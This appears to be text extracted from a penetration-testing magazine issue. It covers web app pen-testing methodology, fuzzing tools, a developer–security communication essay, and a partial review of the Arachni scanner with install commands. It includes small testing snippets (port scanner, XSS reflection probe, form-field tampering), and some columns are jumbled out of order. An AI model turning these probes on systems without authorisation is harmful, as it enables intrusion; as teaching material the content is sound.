Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of the analysis work that can be done is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database, or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon the evaluation of the integration between components (e.g. third-party components and in-house built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application, exposing those most likely to be exploited and allowing similar instances of vulnerabilities to be found throughout the code.
Figure 1: The different activities of the pen testing processes
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
When conducting web penetration testing, different approaches can be used to achieve the security vulnerabilities assessment. Some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach the application security testing team does not have any inside information about the target environment; the knowledge gained is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial Knowledge Test (Gray Box) – In this approach, partial knowledge about the environment under test is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach the penetration testing team has full information about the application and its source code. In such a test the security team performs a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial-of-service attack against it, or use such flaws to gain access to the internal network.
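As an illustration of the white-box idea, a reviewer often starts by flagging obviously risky constructs before reading the code line by line. The patterns below are hypothetical examples, not a complete policy; a real review combines static analysis tools with manual reading:

```python
import re

# Illustrative patterns only; each hints at a class of flaw described above.
RISKY = [
    ("string-built SQL", re.compile(r"execute\([^)]*\+")),   # concatenated query
    ("shell call with input", re.compile(r"os\.system\(")),  # command injection risk
    ("eval of external data", re.compile(r"\beval\(")),      # code injection risk
]

def review(source):
    """Return (line_no, label, line) for each source line matching a risky pattern."""
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        for label, pat in RISKY:
            if pat.search(line):
                findings.append((no, label, line.strip()))
    return findings
```

Such a grep-style pass only narrows the search; confirming that a flagged line is actually exploitable still requires manual analysis.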
It's also important to point out that penetration testing can be conducted as two different types of test:
• External Penetration Testing
• Internal Penetration Testing
Both types of testing can be conducted with minimal information (black box) or with partial or full information (gray or white box).
Figure 2 The different phases of the Pen Testing
Figure 3 shows the different procedures and steps that can be used to conduct the penetration testing. The following is a description of these steps:
• Scope and Plan – In this step the scope of the penetration testing is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step the systems within the defined scope of the project are scanned; automated scanners examine the open ports to detect vulnerabilities, and the hostnames and IP addresses previously collected are used at this stage.
• Creating Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also in this stage, the penetration testing tools are selected based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step vulnerabilities are exploited using the automated tools; the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation, and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and the penetration testing findings are also recommended to be presented later within the final report.
• Improvement – The final step of the penetration testing is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout the pen testing, a specific, structured methodology has to be followed, where the following steps might be used: Enumeration, Vulnerabilities Assessment, and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions, and operating systems. The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s), and any intermediary devices such as firewalls and load balancers. It's also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields, and HTML page sources should be part of the security assessment as well.
Some of the areas that can be covered during the vulnerabilities assessment are the following:
• Input validation
• Access control
Figure 3 Testing techniques, procedures, and steps
• Authentication and session management (session ID flaws) vulnerabilities
• Cross-Site Scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of service (if required)
• Configuration management
• Business logic flaws
• SQL injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except for those that could cause denial-of-service conditions, which are usually discussed beforehand. Possible options for denial-of-service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerabilities assessment is complete, the final reports, recommendations, and comments are summarized, and better solutions are suggested for the implementation process. Once the above assessments are done, the penetration test is half-way done, and the most important part of the assessment has to be delivered: the informative report that highlights all the risks found during the penetration phase.
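To make one of the assessment checks above concrete, here is a minimal sketch of how a tester might classify whether a probe value submitted to the application comes back escaped or unescaped in a response body. The marker payload is an arbitrary example, not a universal XSS test:

```python
import html

# Hypothetical probe value a tester might inject into a parameter.
MARKER = '<script>alert("xss-probe")</script>'

def check_reflection(response_body, marker=MARKER):
    """Classify how an injected probe came back in the response body."""
    if marker in response_body:
        return "unescaped"              # likely reflected XSS candidate
    if html.escape(marker) in response_body:
        return "escaped"                # output encoding was applied
    return "absent"                     # probe not reflected at all
```

A finding of "unescaped" is only a lead; manual verification in a browser is still needed before reporting it as exploitable.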
The following are some of the commonly used tools for traditional penetration testing:
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool usually examines or questions each of the designated network ports or services on the target system. Most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. The configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
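The core connect-scan idea can be sketched in a few lines of Python. This is illustrative only; real scanners such as Nmap add OS fingerprinting, UDP scanning, and stealth options that a naive loop like this cannot provide:

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports
```

Only scan hosts you are authorized to test; even a simple connect scan is noisy and easily logged by intrusion detection systems.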
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners attempt to exercise vulnerabilities on their targeted systems. The main goal of vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and un-patched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard, and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the testers and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, the penetration testers can view all cookies, hidden HTML fields, and other data used by the web application and attempt to manipulate their values to trick the application.
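The hidden-field manipulation described above boils down to rewriting one value in an intercepted form body before it reaches the server. A hedged sketch of that single step (the field names are invented examples; a real proxy such as Burp Suite does this interactively):

```python
from urllib.parse import parse_qsl, urlencode

def tamper(form_body, field, new_value):
    """Rewrite one field of an intercepted application/x-www-form-urlencoded body."""
    pairs = dict(parse_qsl(form_body))   # decode the submitted key=value pairs
    pairs[field] = new_value             # overwrite the targeted field
    return urlencode(pairs)              # re-encode for resubmission
```

If the application honours the tampered value (for example, a client-supplied price), that is a business logic flaw: the server trusted data it should have recomputed.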
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform the penetration testing practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature of the test results.
• Extensibility – The tool can be customized; it must provide scripting language or plug-in
capabilities that can be used to construct customized penetration tests.
• Configurability – A tool that is configurable is highly recommended, to ensure the flexibility of the implementation process.
• Documentation – The tool should provide the right documentation, with a clear explanation of the probes performed during the penetration testing.
• License Flexibility – A tool that offers flexibility of use without specific constraints, such as a particular IP address range or license limits, is a better tool than others.
Security Techniques for Web Apps
Some of the security techniques that can be implemented within a web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Data sent by the browser can never be trusted (e.g., submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to strip incoming data of unwanted content, it might lead to vulnerabilities such as SQL injection, cross-site scripting, and other attacks against the web application.
• Validate data before form submission and manage sessions – This avoids Cross-Site Request Forgery (CSRF), which can occur when a web application accepts form submission data without verifying that it came from its own web form. It is imperative for the web application to verify that the submitted form is the one that the web application had produced and served.
• Configure the server in the best possible way – Network administrators have to follow guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software.
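The first point in the list above, handling untrusted browser data, usually comes down to two habits: parameterised queries for the database and output encoding for HTML. A minimal Python sketch (table and field names are invented for illustration):

```python
import html
import sqlite3

def store_comment(db, user, text):
    """Parameterised insert: the driver quotes values, defeating SQL injection."""
    db.execute("INSERT INTO comments (author, body) VALUES (?, ?)", (user, text))

def render_comment(text):
    """Escape before writing into HTML so script tags become inert text."""
    return "<p>{}</p>".format(html.escape(text))
```

Note the division of labour: the database layer never sees user input spliced into a query string, and the presentation layer never emits user input without encoding it for its output context.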
In addition to the above guidelines, it is always important to enforce strong passwords for the web application's users and to store passwords securely rather than in plain text.
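The form-origin verification described in the list above is commonly implemented with per-session CSRF tokens: the server embeds a token in each form it serves and rejects submissions that cannot present it. A hedged sketch of one such scheme (HMAC-derived tokens; the key handling here is simplified for illustration):

```python
import hashlib
import hmac
import secrets

# Hypothetical per-deployment key; in practice this comes from configuration.
SECRET = secrets.token_bytes(32)

def issue_token(session_id):
    """Derive a per-session CSRF token the server can later recompute."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def verify_token(session_id, submitted):
    """Constant-time check that the submitted token belongs to this session."""
    return hmac.compare_digest(issue_token(session_id), submitted)
```

Because the token is bound to the session and unknown to other sites, a forged cross-site request cannot supply it, and the submission is rejected.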
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying, and ranking the vulnerabilities in a system, where such a process determines if there is a weakness or vulnerability in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerabilities assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-force detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, and as they continue to mature, automated security assessment will continue to reduce both the uncertainty of determination (i.e., false positive results) and the potential to miss some issues (i.e., false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment the automated results, particularly for the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as web applications grow in size, scope, and complexity. The fact that many enterprise organizations will not be able to dedicate the time, money, and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on the human factor to manually test these applications. Moreover, relying on human effort to test for thousands of technical vulnerabilities within these applications is subject to human error and simply can't be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science, and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article we will highlight the most important requirements for a fuzzing tool and also look at the most common mistakes people make with fuzzing.
Documented test cases: When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation: All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: Proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: If the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution. This is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in the software.
Using hardware test beds: Appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you wherever testing is needed, and are not locked to a physical test lab.
Unprepared for cloud: A fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer, and what are the qualities that a fuzzing tool should have?
Model-based test suites: Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use: Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated: Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage: Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable: Time is almost always an issue when it comes to testing. The user must also have control over the fuzzing parameters, such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can use more time in testing and can select other test completion criteria.
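The "anomalous data" idea behind all of the above can be sketched as a toy mutation fuzzer: take a valid input, flip a few random bytes, and watch the target for crashes. This is exactly the naive random fuzzing the sidebar warns against relying on, shown here only to make the mechanism concrete (the target function is a hypothetical parser):

```python
import random

def mutate(seed, n_flips=4, rng=None):
    """Produce an anomalous variant of a valid input by XOR-flipping random bytes."""
    rng = rng or random.Random(0)
    data = bytearray(seed)
    for _ in range(n_flips):
        pos = rng.randrange(len(data))
        data[pos] ^= rng.randrange(1, 256)   # nonzero XOR guarantees a change
    return bytes(data)

def fuzz(target, seed, cases=100):
    """Feed mutated inputs to `target`; any exception marks a potential flaw."""
    failures = []
    rng = random.Random(1)                   # fixed seed keeps runs reproducible
    for _ in range(cases):
        case = mutate(seed, rng=rng)
        try:
            target(case)
        except Exception as exc:
            failures.append((case, exc))
    return failures
```

A model-based fuzzer improves on this by mutating fields of a protocol model instead of raw bytes, so malformed inputs still pass early parsing stages and reach deeper code.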
Application Security members are viewed like the tax man asking for money. Security is sometimes seen as a cost to pay in order to get an application into production. Actually, it is a little of everyone's fault. Since security people and developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve. Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario: the Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep. The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas, and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more to meet the proposed deadline. Security slowly is pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and in project Gantt charts there usually
are no security checkpoints included for code testing, nor time allowed for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security, and it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded into a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
The requested effort is minimal compared to translating an implement a filter policy statement into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach. The security team and the application developers are now on the same page, and everyone is happy. There is a third approach I will cover in a follow-up article: the BDD approach. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected. The idea is straightforward. Using the WAPT activity, instead of an implement a filtering policy statement, you will produce a set of rspec/cucumber scenarios modeling how the source code can deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases, and when testing is complete and all tests pass, it will mean your source code has implemented the filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group.
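The article's examples use rspec and cucumber from the Ruby world; the same behaviour-first idea can be sketched in Python. The filter policy and all names below are invented for illustration: each spec function documents how the code must react to one class of input, and development continues until every spec passes:

```python
import re

def sanitize_param(value):
    """Hypothetical filtering policy: allow only short alphanumeric-and-dash values."""
    if not re.fullmatch(r"[A-Za-z0-9-]{1,64}", value):
        raise ValueError("rejected input")
    return value

# Behaviour specs: executable statements of the remediation requirement.
def spec_accepts_well_formed_input():
    assert sanitize_param("order-42") == "order-42"

def spec_rejects_script_injection():
    try:
        sanitize_param("<script>alert(1)</script>")
        assert False, "malformed input must be rejected"
    except ValueError:
        pass
```

The point is the workflow, not the regex: the security finding arrives as failing specs rather than as a prose report, so the developer knows exactly when the remediation is done.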
In the next article we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are prolonged or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a non-common-ground language that further confuses or annoys everyone and pushes the groups further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are most of the time useless from the developer's point of view, because they do not give specific information with which to pinpoint where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
The security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. They want to know the module, class, or line where the problem exists, so that they can fix it. Given enough time, developers can eventually determine where the problem exists, but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added security facilities inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection, and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works with a programming language that contains a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java programming language community, there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar, and practicing the Tae kwon-do ITF martial art. He's a husband and a daddy, and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
WEB APP VULNERABILITIES
Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools possible for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view.
• A stable, efficient, and high-performance framework: Arachni allows custom modules, reports, and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details.
Pulling the Legs of Arachni
Arachni is a fire-and-forget (or point-and-shoot) web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags
Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients. Multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1, and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler is always run at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies, and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
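To illustrate what such a parsing stage does (this is not Arachni's Nokogiri-based implementation, just a rough standard-library analogue), a scanner's parser walks the markup and collects the attack surface: every link to crawl and every form to audit. Python's tolerant `html.parser` makes for a compact sketch:

```python
from html.parser import HTMLParser

class PageScraper(HTMLParser):
    """Collect links and form targets the way a scanner's parser might."""
    def __init__(self):
        super().__init__()
        self.links = []   # href values of anchor tags, for the crawler
        self.forms = []   # form action URLs, inputs for the audit modules

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and "href" in attrs:
            self.links.append(attrs["href"])
        elif tag == "form":
            self.forms.append(attrs.get("action", ""))
```

Like the tolerant parsing the article describes, `html.parser` does not reject malformed markup; it simply emits the tags it can recognise, which is the right trade-off for a scanner facing real-world HTML.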
Arachni offers a very simple and easy-to-use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni also offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit.
• Form-based AutoLogin: performs an automated login.
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication.
• Profiler: performs taint analysis with benign inputs and response-time analysis.
• Cookie collector: keeps track of cookies while establishing a timeline of the changes.
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL.
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files.
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes.
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  • AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization.
  • TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with. It also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing.
  • Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization.
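The rDiff-style behavioural comparison used by the WAF Detector can be illustrated with a deliberately simplified sketch (this is not Arachni's implementation; the responses below are hypothetical stand-ins for real HTTP traffic):

```ruby
# Simplified illustration of baseline-vs-probe behavioural comparison:
# a large difference between a known-good response and the response to a
# malicious-looking request suggests something (e.g. a WAF) intervened.
def behaviour_changed?(baseline, probed, tolerance = 0.1)
  diff = (baseline.length - probed.length).abs.to_f / baseline.length
  diff > tolerance
end

normal  = "x" * 2000            # stand-in for a normal 2000-byte page
blocked = "Request blocked"     # stand-in for a WAF block page
puts behaviour_changed?(normal, normal)    # false
puts behaviour_changed?(normal, blocked)   # true
```

The real plug-in compares far more than response length, but the principle is the same: establish normal behaviour first, then look for deviations when malicious inputs are sent.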
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
can even run its dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can also work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. If you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make things easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsql3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
